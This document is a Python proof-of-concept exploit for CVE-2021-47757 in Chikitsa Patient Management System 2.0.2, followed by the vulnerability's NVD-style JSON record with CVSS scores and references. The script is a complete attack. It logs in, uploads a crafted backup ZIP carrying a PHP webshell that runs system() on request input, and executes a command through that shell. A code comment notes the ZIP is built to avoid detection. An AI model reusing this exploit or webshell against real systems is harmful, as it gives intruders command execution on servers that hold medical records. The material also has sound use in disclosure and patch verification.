CVE-2021-47757

#!/usr/bin/env python3 # CVE-2021-47757 PoC - Chikitsa Patient Management System RCE via Backup Restore # Author: Security Researcher import zipfile import os import requests from io import BytesIO # Malicious PHP webshell payload webshell_content = b"<?php\nif(isset($_REQUEST['cmd'])){\n $cmd = $_REQUEST['cmd'];\n system($cmd);\n}\n?>" def create_malicious_backup(): """Create a malicious backup ZIP file with embedded PHP webshell""" zip_buffer = BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: # Add malicious PHP file to the backup zip_file.writestr('webshell.php', webshell_content) # Add legitimate backup structure to avoid detection zip_file.writestr('backup_info.json', '{"version":"2.0.2","timestamp":"2021-01-01"}') return zip_buffer.getvalue() def exploit(target_url, username, password): """ Exploit the backup restore functionality to achieve RCE """ session = requests.Session() # Step 1: Login to the application login_url = f"{target_url}/index.php/user/login" login_data = { 'username': username, 'password': password } response = session.post(login_url, data=login_data) if 'login' in response.url.lower(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Upload malicious backup backup_url = f"{target_url}/index.php/backup/restore" malicious_backup = create_malicious_backup() files = { 'backup_file': ('malicious_backup.zip', malicious_backup, 'application/zip') } response = session.post(backup_url, files=files) # Step 3: Execute command via webshell webshell_url = f"{target_url}/webshell.php" cmd = "whoami" response = session.get(webshell_url, params={'cmd': cmd}) if response.status_code == 200: print(f"[+] RCE Successful! Command output: {response.text.strip()}") return True else: print("[-] Exploitation failed!") return False if __name__ == "__main__": target = "http://target.com/chikitsa" exploit(target, "attacker", "password")

{"cve": {"id": "CVE-2021-47757", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:06.510", "lastModified": "2026-01-23T18:17:28.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability in the backup restoration functionality. Authenticated attackers can upload a modified backup zip file with a malicious PHP shell to execute arbitrary system commands on the server."}, {"lang": "es", "value": "Chikitsa Patient Management System 2.0.2 contiene una vulnerabilidad de ejecución remota de código autenticada en la funcionalidad de restauración de copias de seguridad. Atacantes autenticados pueden subir un archivo zip de copia de seguridad modificado con un shell PHP malicioso para ejecutar comandos de sistema arbitrarios en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chikitsa:patient_management_system:2.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "8B5051D5-3E76-4B85-931A-332E8A59244F"}]}]}], "references": [{"url": "https://github.com/sanskruti-technologies/chikitsa", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/chikitsa/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.chikitsa.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50572", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}]}}